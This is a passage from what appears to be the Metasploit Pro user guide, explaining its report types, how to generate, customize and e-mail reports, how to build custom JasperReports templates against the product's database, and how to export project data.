Description Output formats Reports all cracked hosts, passwords, SMB hashes, and SSH keys that were collected and discovered. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Report sections Report directory Report template Project Summary, Executive Summary, Authentication Token Summary, Guessed Password Summary, and Authentication Token Details /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
Collected Evidence Report

Description Output formats Reports on all looted hosts. Describes the files and screenshots that were collected from compromised hosts. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to
439
accompany statistical findings in the report. Report sections Report directory Report template Project Summary, Executive Summary, Evidence Summary Table, Complete Evidence Table, Collected Screenshots, and Collected Text Files /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
Compromised and Vulnerable Hosts Report

Reports on all hosts on which Metasploit was able to open a session, hosts on Description Output formats which a Metasploit module was successfully run, and hosts where a vulnerability was recorded. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Report sections Report directory Report template Project Summary, Executive Summary, Compromised Summary, Compromised Hosts, and Vulnerabilities and Exploits /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
FISMACompliance Report
Description Output formats Reports on FISMA compliance criteria. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
440
Report sections Report directory Report template
Executive Summary, Detailed Findings /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
PCICompliance Report
Description Output formats Reports on PCI compliance criteria. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Report sections Report directory Report template Executive Summary, Requirements Status Summary, Host Status Summary, Detailed Findings /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
Services Report
Services Output formats Reports on all network services that were scanned or imported. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Report sections Report directory Report template Project Summary, Executive Summary, Network Service Summary, Network Services Table /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
441

Description Output formats Provides comprehensive results and data for a particular campaign. PDF, HTML, WORD, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Cover Page, Executive Summary, Social Engineering Funnel, Exploits Used, Report sections Form Submissions, Browser/Platform Information, Appendices: Hosts Details, Human Targets, Appendix: Campaign Components (Web page/e-mail HTML content), and Appendix: Remediation Advice Report directory Report template /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
WebApplication Assessment Report

Description Output formats Enumerates all web sites and their vulnerabilities, forms, and pages. PDF, HTML, RTF Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password. Report options Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report. Report sections Report directory Report template Cover Page, Executive Summary, Engagement Scope, OWASP Status, Summary Graphs, Vulnerability Details, and Appendices /path/to/metasploit/pro/reports/audit/ /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
442
Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports

A report clearly presents project data in a distributable and tangible output format. It organizes your findings into relevant sections, displays charts and graphs for statistical data, and summarizes major findings. This is extremely useful when you need to share information with people who do not have access to Metasploit Pro or who want to quickly process your test results. All tasks related to reports, such as generating, downloading, e-mailing, and deleting them, can be performed from the Reports area of the web interface.
Notification Center Statuses for Reports

When you generate a report, the Notification Center alerts you when a report has started generating, finished generating, or encountered an error during generation. The NotificationCenter appears as an icon in the upper-right corner of the global toolbar and displays the total number of unread notifications. You can click on the NotificationCenter icon to display a list of alerts.
The NotificationCenter displays the following statuses for reports:

l
Report started - This status indicates that the report has started generating. Report finished -This status indicates that the report was generated without errors and is ready for you to view and download. You can click on the alert to open the report. When you open the report from the Notification Center, it displays a unified view of the report and shows the formats that are available for it. You can click on any of the format icons to view the report in the selected format. Problem with report - This status indicates that there was an issue with the report and it was not able to finish. You will need to view the report log to troubleshoot the issue. For more information on report logs, see Report Logs on page 434.
Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports
443

1. Open the project that contains the data you want to use to create a report. 2. Select Reports >Create Standard Report from the Project tab bar.
The Reports page appears with the Generate Standard Report tab selected. 3. Click the Report type dropdown and choose the report you want to generate.
For more information on the report types that are available, see Metasploit Report Types on page 438. 4. Choose the file formats you want to generate for the report.
You can generate multiple formats for a report at the same time. Most reports can be generated as PDF, Word, RTF, or HTML documents; however, the Web Application Assessment Report cannot be generated as a Word file. 5. Enter a name for the report in the Report Name field. (Optional)
If you do not specify a name, Metasploit Pro uses the report type and the timestamp. For example, an Audit Report will be named Audit-20140106140552. 6. Use the Included addresses to explicitly define the hosts you want to include in the report. (Optional) For example, if you only want to include specific hosts in the report, you should define those hosts in the Included Addresses field. All other hosts will not be included in the report.
444
7. Use the Excluded addresses to explicitly define the hosts you want to exclude from the report. (Optional) For example, if you only want to exclude specific hosts from the report, you should specify those hosts in the Excluded Addresses field. All other hosts will be included in the report. 8. Click the Campaign dropdown and select the campaign you want to use to create a report. (Social engineering reports only) The report form only displays the campaigns that are stored in the project. 9. Click the CoverLogo dropdown and select the logo that you want to use on the cover page of the report.
If you have not uploaded a logo to the project, you must upload the logo that you want to use to the Custom Report Collateral area of the project. For more information on uploading a logo, see Adding a Custom Logo to a Report on page 457. 10. Select the report sections that you want to include in the report. The report sections that are available will vary between reports. For more information on the sections available for each report, see Understanding Report Types on page 438. 11. Enable or disable any report options to manage the data that appears in the report. The report form displays the options that are applicable for the report type that you have selected. The following report options may be available:
l
Mask discovered passwords - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The report displays the user name and a blank password. Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in a report. Include web page HTML (in addition to image preview) - Includes the original page code as raw text as well as the rendered preview image. (Social Engineering Campaign Details Report only)
12. Enter the e-mail addresses you want to send the report to after the report generation. (Optional) You can use a comma or semi-colon to separate multiple e-mail addresses. To e-mail a report, you must have an active mail server configured through the Global Settings. For more information on setting up a mail server, see Defining SMTP Settings for a Mail Server on page 40.
445
13. Generate the report. When the report generation begins, the web interface redirects you to the ViewReports tab. At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the notification message or you can select Reports >Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.
Generating Additional Formats for a Report

1. Open the project that contains the report for which you want to generate additional formats. 2. Select Show Reports from the Project tab bar. The Show Reports page appears. 3. Find the row that contains the report for which you want to generate additional formats. The row shows the metadata and the file formats that are available for the report. 4. Click on the report name to open it. The unified report view will open and display a preview of the report. The formats that are available for the report will be displayed in the sidebar. Formats that have a colored icon and checkbox have already been generated. Formats that are grayed out have not been generated. 5. Click on the file format that you want to generate for the report. You can only generate one format at a time.
When the report generation begins, the format button will be replaced with a progress indicator. The format button will reappear when the report is ready for you to view or download.
446
At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the latest notification message or you can select Reports >Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.
Generating MetaModule Reports

AMetaModule provides a guided interface to walk you through a single penetration testing task. Each MetaModule leverages the core functionality of a module, such as password testing, but enables you to quickly configure and run the module with minimal set up. Each MetaModule includes a specialized report, which contains data that is specific to the MetaModule run. MetaModule reports are configured from within the MetaModule and are generated when the MetaModule runs. After the MetaModule generates the report, you can view the report from the Reports area. For more information on MetaModule reports, see MetaModule Reports on page 290.
Generating a CustomReport
A custom report is created using a user-uploaded Jasper report template. The template defines the layout of the report and the sections that the report contains. You can create a report template from scratch using
447
a tool like iReport. For more information on custom templates, see Working with Custom Templates on page 461. Before you can generate a custom report, you must upload the template that you want to use to the Custom Report Collateral area of the project. If the project does not contain any custom report templates, the New Custom Report form will not load. Instead, the form displays a warning that the project does not contain any templates. You must upload a valid JRXML template to continue. For more information on uploading a custom template, see Uploading Templates on page 466.
To generate a custom report:

1. Open the project that contains the data you want to use to create a report. 2. Select Reports >Create Custom Report from the Project tab bar. The New Custom Report page appears.
3. Select the template you want to use to create the report. 4. Choose the file formats you want to generate for the report.
You can select multiple formats. All formats will be generated for the report at the same time. 5. Enter a name for the report in the Report Name field. (Optional)
If you do not specify a name, Metasploit Pro uses the report type and the timestamp. For example, an custom report will be named Custom-20140106140552. 6. Use the Included addresses to explicitly define the hosts you want to include in the report. (Optional) For example, if you only want to include specific hosts in the report, you should define those hosts in the Included Addresses field. All other hosts will not be included in the report. 7. Use the Excluded addresses to explicitly define the hosts you want to exclude from the report. (Optional)
448
For example, if you only want to exclude specific hosts from the report, you should specify those hosts in the Excluded Addresses field. All other hosts will be included in the report. 8. Click the Cover Logo dropdown menu and select the logo you want to display on the cover page of the report. (Optional)
If you do not select a logo, the report will use the default Rapid7 logo. 9. Enter the e-mail addresses you want to send the report to after the report generates. (Optional) You can use a comma or semi-colon to separate multiple e-mail addresses. To e-mail a report, you must have an active mail server configured through the Global Settings. For more information on setting up a mail server, see Defining SMTP Settings for a Mail Server on page 40. 10. Generate the report. When the report generation begins, the web interface redirects you to the ViewReports tab. At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the notification message or you can select Reports >Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.
Downloading a Report
1. Open the project that contains the report you want to download. 2. Select Reports >Show Reports from the Project tab bar. The Reports page appears.
3. Find the row that contains the report you want to view. The row displays the metadata and the file formats that have been generated for the report.
Downloading a Report
449
4. Click on the report name to open it. The unified report view will open and display a preview of the report. 5. Select the formats you want to download.
The formats that are available for the report will have an active checkbox located next to them. 6. Click the Download button located under the Report Actions area.
The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the report to your computer.
Viewing a Report
1. Open the project that contains the report you want to view. 2. Select Reports >Show Reports from the Project tab bar. The Reports page appears.
Viewing a Report
450
3. Find the row that contains the report you want to view.
The row displays the metadata and the file formats that have been generated for the report. 4. Click on the format that you want to view the report in. The report will open in your browser.
E-mailing a Report
You can quickly share reports by e-mailing them as soon as they are generated. Both the standard and custom report generation forms have an Email Report field that enables you to define a list of e-mail recipients.
As long as you have a valid mail server configured for your Metasploit Pro instance, the report will automatically be sent to the e-mails you have listed.
Setting Up a Mail Server

In order to utilize e-mail capabilities, you must have access to a local mail server or a web mail server. You need the address and port that the mail server runs on, the domain name that hosts the mail service, and the credentials for the mail server. For more information on setting up a mail server, see Defining SMTP Settings for a Mail Server on page 40.
Cloning a Report Configuration

You can clone a report to make a copy of an existing report's configuration. Report cloning enables you to reuse and rerun a previously generated report. You can modify the configuration or run it as it is.
E-mailing a Report
451
To clone a report:
1. Open the project that contains the report you want to delete. 2. Select Reports >Show Reports from the Project tab bar.
The Reports page appears. 3. Find the row that contains the report that you want to clone.
4. Click the Clone link located under the Actions column.
The New Report form appears.The form retains the configuration settings that you used to generate the original report.
Deleting Reports
When you delete a report, it will be permanently removed from the Reports directory, and you will no longer be able to view it from the Reports area of the web interface. Please make sure that you have the data that you need from the report before you delete it.
Deleting Reports
452
To delete a report:
1. Open the project that contains the report you want to delete. 2. Select Reports >Show Reports from the Project tab bar.
The Reports page appears. 3. Select the report or reports that you want to delete. 4. Click the Delete button located in the Quick Tasks bar.
The browser will ask you to confirm that you want to delete the report. 5. Select OK to delete the report.
Deleting Reports
453
Customizing Standard Reports

A standard report is based on a Metasploit report template, which controls the look and feel of the report. All reports have a cover page and include a set of options that enable you to manage the report data. You can customize some parts of a standard report, such as the logo and sections of content that appear in the report. If you want to modify the layout of the report, you will need to use a custom template. For more information on custom templates, see Working with Custom Templates on page 461.
Excluding Report Sections

A report is made up of multiple sections. Each section divides the report content into distinct areas of information. When you view the New Report form, you will see the sections that are available for the report you have selected. By default, all sections will be selected. If you want the report to only show certain sections of a report, you can exclude sections from the report.
To exclude specific sections, you can deselect the sections you do not want to appear in the report. When you generate the report, you will not see the excluded sections in the report. Additionally, the report will only show content for the sections for which it has data. For more information on report sections, see Metasploit Report Types on page 438.
Excluding and Including Hosts from Reports

When you generate a report, Metasploit Pro automatically includes data from all hosts in the project. If you want to limit the data to a particular set of hosts, you can create an inclusion or exclusion list.
Customizing Standard Reports
454
Creating Inclusion Lists

An inclusion list defines the hosts that you want to include in a report. Only the data for the hosts that you have explicitly defined will be displayed in the report. You create an inclusion list from the New Report form . Use the Included addresses field to define the specific hosts you want to include in the report. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
Creating Exclusion Lists

An exclusion list defines the hosts that you do not want to include in a report. The report will include data for all of the hosts in the project, except for the ones that you have defined in the exclusion list. You create an exclusion list from the report generation form. Use the Excluded addresses field to define the specific hosts you want to exclude from the report. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
Masking Credentials from Reports

You can mask credentials if you do not want to include the plain text passwords and hashes in the Audit, Authentication Tokens, FISMA, and PCI reports.
Masking Credentials from Reports
455
To mask credentials from a report, you need to select the credential masking option on the New Report form. Select the Mask discovered credentials option to enable credential masking in your report.
When the masking option is enabled, the reports will not display plaintext credentials. For example, when you view the generated Audit report, the Compromised Credentials section only shows the host addresses, services, and user names that were discovered. The password, hash, and key fields are blank.
Other reports, such as the PCI and FISMA reports, replace all credentials with <blank>.
Removing Charts from Reports

Charts visually present numerical data. They are effective when you use to them present and compare large sets of information. You can include them in a report to simplify quantitative data and to highlight trends in your findings. Metasploit Pro reports mostly use pie charts to illustrate how data is distributed across different categories. Most reports, with the exception of the FISMA,PCI,Social Engineering, Web Application Assessment, and Activity reports, have the option to include charts. By default, this option is enabled, so charts will be automatically generated for applicable reports. If you do not want to include charts in your report, you can disable the charts and graphs option. To exclude charts and graphs from a report, deselect the Include charts and graphs option.
Including Web Page HTML in Social Engineering Reports

The Social Engineering Report presents the findings and data for a particular campaign. It contains the details for the campaign components that you used to build the campaign, such as the target list, e-mail,
Removing Charts from Reports
456
and web pages used. The raw content for the target list and e-mail will automatically be included in the report. If you want to include the raw content for the web pages, you will need to enable the Include web page HTML option. If enabled, this option includes the HTML for each web page used in the campaign. A preview of the web page will render in the report if the web page was used as part of a campaign. Note: If the web page delivered malicious code, such as a client-side exploit, Java applet, or executable file, a preview will not be rendered for the web page. If you want to include the raw HTML that was used to create a web page and a preview of the web page, you can select the Include web page HTML option on the New Report form.
Customizing Report Names

Metasploit Pro uses the following naming convention for report names: <report type><timestamp>. The report name appears in the Reports list. You can change the name by replacing the default name in the Report Name field on the New Report form.
Adding a Custom Logo to a Report

All reports include a cover page that displays the title, logo, and timestamp. The cover page displays the Rapid7 image as the default logo on all reports. If you want to replace the default logo, you can upload a JPG, GIF, or PNG file. The uploaded logo can be used to brand a report with your organization's identity. The logo appears in the right side of the cover page and replaces the default Rapid7 logo.
Customizing Report Names
457
Logo Requirements
The logo area on the cover page is 320 x 320 pixels. You can upload an image that is larger than the logo area, but the logo will be resized to fit the cover page.
If the image is larger than the logo area, the height of the image will be preserved, but the width will be resized.
458
Uploading a Custom Logo

1. Open the project that you want to upload the logo to. 2. Select Reports >Create Custom Report from the Project tab bar. The Reports page appears. 3. Find the Custom Report Collateral area.
4. Click the Upload Custom Report Collateral button.
The Upload window appears. 5. Click the Choose File button.
The Open dialog window appears. 6. Browse to the location of the logo file. Note: You can upload a GIF, JPEG, JPG, or PNG file.
459
7. Select the logo file and click the Open button. 8. Enter a name for the file in the Descriptive Name field. (Optional)
If you do not specify a name, the Custom ReportCollateral area shows the original file name. 9. Click the Upload button. The file appears under the Custom Report Collateral area.
Adding a Custom Logo to a Standard Report

To use a custom logo on the report's cover page, you need to click the Custom report logo dropdown on the New Report form and select the image you want to use. The dropdown will show the logos that have been uploaded to the project.
If the project does not contain any logos, the New Report form will display a link to the Custom Reports page where you can upload your logo.
460
Working with Custom Templates

Metasploit Pro ships with a set of predefined standard reports, which are created with Metasploit templates and designed to meet basic pentesting reporting requirements. However, if the standard reports do not provide you with the content or layout that you need, you can use a custom template to build your report. A custom template enables you to do things like apply corporate styles to your reports, control how and where content is displayed in your reports, and customize your reports for regional compliance needs. A custom template is a JRXML file, which is an XML document with a JasperReport file extension. It contains the report structure, which defines where the report displays content, where it places images, and how it queries data. It can be built by directly manipulating XML or more easily by using a visual report tool for JasperReports, such as iReport Designer or the Eclipse-based Jaspersoft Studio.
Jasper Reports and iReport Designer

Metasploit Pro uses JasperReports 5.0, which is an open source Java-based reporting library, to compile JRXML templates and generate reports in output formats such as PDF, RTF, HTML, and Word. The JRXML template is a standards-based XML file that defines the elements and attributes that control where content is placed in a report. You can build the JRXML template with a visual report designer called iReport Designer, which is an open source tool maintained by Jaspersoft. iReport Designer provides a graphical user interface that enables you to visually design your report templates without extensive knowledge of the JasperReports library, XML, and Java. You can drag and drop report elements to create layout of the report, and you can connect it to a data source, like JDBC and XML, to query data for the report. The resulting JRXML template can be imported into a Metasploit Pro project and used to create a custom report.
Downloading Jasper iReport

To download Jasper iReport, please visit the following site: http://jasperforge.org/projects/ireport.
Resources for JasperReports and iReport Designer

In order to build a custom template, you must be familiar with JasperReports and iReport Designer. There are quite a few resources available that will help you learn how to build report templates with iReport Designer and understand how JasperReports works. To learn more about JasperReports or iReport Designer, visit the following resources:
l
JasperReports documentation list - A list of the documentation that is available for JasperStudio, JasperReports Server, JasperReports Library, and iReport Designer. You can access this list at the following URL: http://community.jaspersoft.com/documentation.
Working with Custom Templates
461
JasperReports Library materials reference - A list of the documentation, webinars, and articles that may be helpful for working with JasperReports. You can access this list at the following URL: http://community.jaspersoft.com/wiki/jasperreports-library-reference-materials. iReport Designer tutorials and help wiki - A wiki that lists the tutorials that are available for iReportDesigner. You can access this list at the following URL: http://community.jaspersoft.com/wiki/ireport-designer-tutorials-help. An article on chart customizations - A useful list of chart customizers for JasperReports, iReport Designer, and JasperReports Server. You can view this article at the following URL: http://mdahlman.wordpress.com/2011/04/17/chart-customizers-2/. Groovy documentation - Groovy is a Java-compatible scripting language that you can use in place of Java to define expressions in iReport.
To learn more about how Groovy and iReport Designer work together, visit the iReport wiki here: http://http://community.jaspersoft.com/wiki/ireport-designer-groovy. To learn more about Groovy, you can view their documentation here: http://groovy.codehaus.org/.
Jaspersoft training - To learn more about Jaspersoft training, you can visit https://www.jaspersoft.com/training-services or https://www.jaspersoft.com/training.
Requirements for Designing Custom Templates

To design a report template, you will need the following:
l
Experience with Jasper iReport, JasperReports, XML, and SQL/XPath Experience with Java or a Java scripting language, like Groovy or Javascript A working instance of JasperiReport Access to theMetasploit database
Setting Up the Metasploit Database in iReport Designer

To fill your report with data, you will need to set up a data source that points to the Metasploit postgres server. The information for the Metasploit postgres server can be found in /path/to/metasploit/apps/pro/config/database.yml. You will need the following information from the database.yml file:
l
The database name - The default database name is msf3. The postgresql port - The default postgresql port is 7337. The user name - The default user name is msf3. The password - Please view the database.yml file for your database password.
Requirements for Designing Custom Templates
462
To set up a data source in iReport Designer:

1. Open iReport Designer. The Quick Start window appears. 2. Click the Database Connection icon.
The Datasource window appears. 3. Select Database JDBC connection from the list of data sources.
463
4. Click Next. The Database JDBCConnection window appears.
5. Enter a name for the connection in the Name field.
6. Replace with content in the JDBC URL field with jdbc:postgresql://localhost:7337/msf3.
464
7. Enter the database user name in the Username field.
8. Enter the database password in the Password field.
9. Test the connection. If the connection is working properly, a window appears and alerts you that the connection was successful. Otherwise, if the connection fails, an exception window appears and alerts you that there is an issue with your database settings. You will need to verify that your database settings match the information in the database.yml file. 10. Save the connection, if the connection was successful. You are now ready to create your report template. For resources on creating report templates, see Resources for JasperReports and iReport Designer on page 461.
465
Custom Resources Directory

All custom templates and logos are stored in the following directory: /path/to/metasploit/apps/pro/reports/custom_resources. You can go to the custom resources directory to download or view logos and templates; however, you should not make any changes directly within the directory. If you need to modify your logos or templates, you should make a copy of the directory and make your changes from the new directory. Any changes that you make directly from within the custom reports directory can cause disparities between the metadata that displays for the file in the webinterface and the file itself. If you need to remove or add custom resources, you should do it from within the web interface. Do not delete them directly from the custom resources directory.
Uploading Templates
After you have created your custom template, you will need to upload it to the project you want to use to build the custom report. The template will only be available to the project that you have uploaded it to; therefore, if you want to use the template across multiple projects, you will need to import the template into each project. When you view the New Custom Report form, the template will be available in the Report Template dropdown menu.
Custom Resources Directory
466
To upload a template:
1. Open the project you want to use to store the custom template. 2. Select Reports >Create Custom Report from the Project tab bar.
The Reports page appears with the Generate Custom Report tab selected. 3. Find the Custom Report Collateral area.
If your project does not contain any templates, the New Custom Report page will not show the form. 4. Click the Upload Custom Report Collateral button.
The Upload window appears.
Uploading Templates
467
5. Click the Choose File button.
The Open Dialog window appears. 6. Browse to the location of the logo file. 7. Select the template and click the Open button. The template must have a JRXML extension. 8. Enter a name for the template in the Descriptive Name field. (Optional)
If you do not specify a name, the Custom ReportCollateral area shows the original file name. 9. Click the Submit button. The template appears under the Custom Report Collateral area.
You are now ready to generate a custom report. For more information on generating custom reports, see Generating a CustomReport on page 447.
Uploading Templates
468
Downloading a Custom Report Template

1. Open the project that contains the custom report template that you want to download. 2. Select Reports >Create Custom Report from the Project tab bar.
4. Find the row that contains the custom report template you want to download.
The row displays the metadata and the actions that are available for the custom report template. 5. Click the Download link.
The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the template to your computer.
Downloading a Custom Report Template
469
Deleting a Custom Report Template

1. Open the project that contains the custom report template that you want to delete. 2. Select Reports >Create Custom Report from the Project tab bar.
4. Find the row that contains the custom report template you want to delete.
The row displays the metadata and the actions that are available for the custom report template. 5. Click the Delete link.
The browser will prompt you to confirm that you want to delete the custom report template.
Deleting a Custom Report Template
470
Downloading the Example Template

Metasploit Pro provides you with an example template that you can use as a reference when creating your own templates.The template provides simple examples that show you how you can query data, such as host IP addresses, names, operating systems, services counts, and vulnerabilities counts from a project, and display that information in a table. Additionally, you can see examples for adding a title and footer to the report.
To download the example template:

1. Open any project. 2. Select Reports >Show Reports from the Project tab bar. The Reports page appears. 3. Scroll to the bottom of the Reports page.
471
4. Click the Download Example Template link, which is located below the reports table.
The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the report to your computer.
472
Exporting Data
A data export enables you to routinely back up project data and create an archive of your tests. When you export data from a project, its contents are copied and saved to a file that can be imported into other projects or shared with other instances of Metasploit Pro. All exports can be downloaded from the Exports area of the web interface or from the exports directory.
Exports Directory
When Metasploit Pro generates an export, it stores a copy of the file in /path/to/Metasploit/apps/pro/exports. The files that are stored in this directory will match the list of exports displayed in the web interface. You can go to the exports directory to download or view exported data; however, you should not make any changes directly to the default exports directory. If you need to modify the export files, you should make a copy the exports directory and make your changes from the new directory. Any changes that you make directly to the export files can cause disparities between the metadata that displays for the file in the webinterface and the file itself. If you need to remove exports from a project, you should do it from within the web interface. Do not delete them directly from the exports directory.
Viewing Exports Generated with Metasploit Pro 4.8 and Earlier

All exports generated with 4.8 and earlier are stored in /path/to/Metasploit/apps/pro/reports. These exports were created with an older version of Metasploit Pro and were not migrated to the exports directory that was added in Metasploit Pro 4.9. These files will not be listed or accessible from the web interface.
Export Logs
The export log maintains a historical record of all export-related events. Metasploit Pro automatically updates the export log each time you export data from a project. If you experience any issues with an export, you can view the export log to find stack trace errors and troubleshoot them.
Viewing the Export Log

You can find and view the export log in the following directory: /path/to/Metasploit/apps/pro/ui/log. The export log is named exports.log.
Exporting Data
473
Clearing the Export Log

To clear the export log, you will need remove it from the log directory, which is located at /path/to/Metasploit/apps/pro/ui/log. Metasploit Pro will generate a new export log if it detects that one does not exist. Note: Before you delete the export log, you should make a copy of it in case you need it for reference later.
Notification Center Statuses for Exports

The Notification Center alerts you when an export has started, finished, or encountered an error. The NotificationCenter appears as an icon in the upper-right corner of the global toolbar and turns green when there is an alert is available for you to review. You can click on the Notification Center icon to view a list of notifications for all projects.
The NotificationCenter displays the following statuses for exports:

l
Export started - This status indicates that the export has started. Export finished -This status indicates that the export has completed without errors and is ready for you to download. You can click on this alert to open the Exports page, which will list all of the export files that have been generated for the project. You can sort by the creation date to find the latest export file. Problem with export - This status indicates that there was an issue with the export and it was not able to finish. You will need to view the export log to troubleshoot the issue. For more information on export logs, see Export Logs on page 473.
Export Types
Metasploit Pro offers the following export types:
l
XML export - An XML file that contains the attributes for most of the objects in a project and can be imported into another project. XML exports are particularly useful if you have a data set that you want to reuse in another project or share with another instance of Metasploit Pro. For example, you can export an XMLof project data if you want to reuse the scan data from a particular project.
Notification Center Statuses for Exports
474
Workspace ZIP - A zip that contains an XML export and any loot files, report files, and tasks logs. This export type is useful if you want to back up the data and contents in a project or share the project with other instances of Metasploit Pro. Replay script - A batch file that reruns tasks that opened sessions on target hosts. A replay script consists of multiple resource files (.rc). Metasploit Pro creates a resource file for each session it opens. You can run a replay script from the pro console or msfconsole. PWDump - A text file that contains all of the credentials for a project, including plaintext passwords, SMB hashes, and SSH keys. Credentials can be masked to enumerate user names only.
XMLExports
When you export your project as an XML file, it contains most of the data that you see from the Analysis area of a project--with a few exceptions. The exported XML file contains most of the objects in a project's database and their attributes; it does not include any files that are associated with the objects in a project, such as task logs, generated reports, and loot files. When you view the XML export file, you will see the following objects:
l
Hosts - Contains the details for each host in the project, including the following attributes: notes, tags, vulnerabilities, credentials, and sessions. It also include host details, such as the host ID, IP address, MACaddress, host name, OS name, OS flavor, OSservice pack, and purpose. Events - Contains the event log for the project. Each event includes the workspace ID, event creation date, event name, and name of the user who launched the task. Sessions - Contains the details for each session obtained in the project, including the following attributes: host ID, session type, module used, session description, port used, and session open/close dates. Services - Contains the details for each service discovered in the project, including the service ID, host ID, port number, protocol type, state, service name, creation date, and modification date. Credentials - Contains the details for each credential stored in the project, including the credential ID, service ID, user name, password, creation date, and modification date. Web sites - Contains the details for each web server discovered, including the website ID, service ID, host address, VHOST address, HTTP port, creation date, and modification date. Web pages - Contains the details for each web page discovered, including the web page ID, HTTP response code, VHOST address, web server address, HTTP port, content type, page content, creation date, and modification date. Web forms - Contains the details for each web form discovered, including the web form ID, form path, request method, VHOST address, web server address, HTTP port, content type, page content, creation date, and modification date. Web vulnerabilities - Contains the details for each web vulnerability discovered, including the vulnerability category, vulnerability description, vulnerability confidence ranking, request method, vulnerability name, HTTP port, proof text, VHOST address, and vulnerability blame.
Export Types
475
Note: Additional attributes may be available for each object; however, this list covers the most common attributes for each object.
Creating an XMLExport of Project Data

1. Open the project from which you want to export data. 2. Select Exports >Export Data from the Project tab bar. The Export Data page appears.
3. Select XMLExport from the Export Format section.
4. Replace the export file name with a custom name, if you do not want to use the default name. (Optional) 5. Define the hosts you want to explicitly include in the Included addresses field. (Optional) 6. Define the hosts you want to explicitly exclude in the Excluded addresses field. (Optional) 7. Select the Mask credentials option from the Export Options section if you do not want to include credentials in the export. The credentials will be replaced with **MASKED** in the XML file. If you import the XML file into a project, the credentials will not be included. 8. Click the Export Data button. When the export begins, you will be taken back to the Exports page. The Exports page displays an "Export creation queued" message.
Export Types
476
